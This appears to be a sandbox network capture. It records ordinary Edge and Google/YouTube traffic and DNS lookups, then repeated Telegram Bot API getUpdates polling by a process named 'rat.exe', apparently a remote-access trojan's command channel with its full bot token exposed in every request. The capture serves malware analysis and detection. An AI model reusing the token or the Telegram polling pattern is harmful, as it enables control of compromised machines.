GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

14.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

74.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.32.126.40.in-addr.arpa

IN PTR

Response
DNS

22.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.200.250.142.in-addr.arpa

IN PTR

Response

22.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f221e100net
DNS

74.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f101e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f10�H

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f74�H
DNS

195.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

84.173.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

84.173.251.142.in-addr.arpa

IN PTR

Response

84.173.251.142.in-addr.arpa

IN PTR

wi-in-f841e100net
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

rr5---sn-t0a7lnee.googlevideo.com

msedge.exe

Remote address:

8.8.8.8:53

Request

rr5---sn-t0a7lnee.googlevideo.com

IN A

Response
GET

https://www.google.com/js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js

msedge.exe

Remote address:

142.250.187.196:443

Request

GET /js/th/WuArCo6uiOC32QOIiNWeSH9h2H5vf_jv_ihZ0ZQebSo.js HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

youtube.com

msedge.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
GET

https://youtube.com/

msedge.exe

Remote address:

216.58.213.14:443

Request

GET / HTTP/2.0
host: youtube.com
pragma: no-cache
cache-control: no-cache
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.youtube.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.250.179.238:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

14.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.213.58.216.in-addr.arpa

IN PTR

Response

14.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f141e100net

14.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f14�H
DNS

238.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

jnn-pa.googleapis.com

msedge.exe

Remote address:

8.8.8.8:53

Request

jnn-pa.googleapis.com

IN A

Response

jnn-pa.googleapis.com

IN A

216.58.212.234

jnn-pa.googleapis.com

IN A

142.250.187.202

jnn-pa.googleapis.com

IN A

216.58.204.74

jnn-pa.googleapis.com

IN A

142.250.178.10

jnn-pa.googleapis.com

IN A

142.250.200.10

jnn-pa.googleapis.com

IN A

172.217.16.234

jnn-pa.googleapis.com

IN A

142.250.187.234

jnn-pa.googleapis.com

IN A

172.217.169.10

jnn-pa.googleapis.com

IN A

172.217.169.74

jnn-pa.googleapis.com

IN A

216.58.201.106

jnn-pa.googleapis.com

IN A

142.250.180.10

jnn-pa.googleapis.com

IN A

142.250.200.42

jnn-pa.googleapis.com

IN A

142.250.179.234

jnn-pa.googleapis.com

IN A

216.58.213.10

jnn-pa.googleapis.com

IN A

216.58.212.202
OPTIONS

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

msedge.exe

Remote address:

216.58.212.234:443

Request

OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

234.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.212.58.216.in-addr.arpa

IN PTR

Response

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f101e100net

234.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f10�I

234.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f234�I
DNS

81.14.97.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.14.97.104.in-addr.arpa

IN PTR

Response

81.14.97.104.in-addr.arpa

IN PTR

a104-97-14-81deploystaticakamaitechnologiescom
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:56 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:57 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:58 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:01 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:02 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:04 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:08 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:11 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:12 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506693

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506693 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506694

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506694 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506695

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506695 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506696

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506696 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506697

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506697 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506698

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506698 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506699

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506699 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506700

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506700 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506701

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506701 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506702

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506702 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506703

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506703 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:24 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506704

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506704 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506705

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506705 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:26 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506706

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506706 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506707

rat.exe

Remote address:

149.154.167.220:443

Request

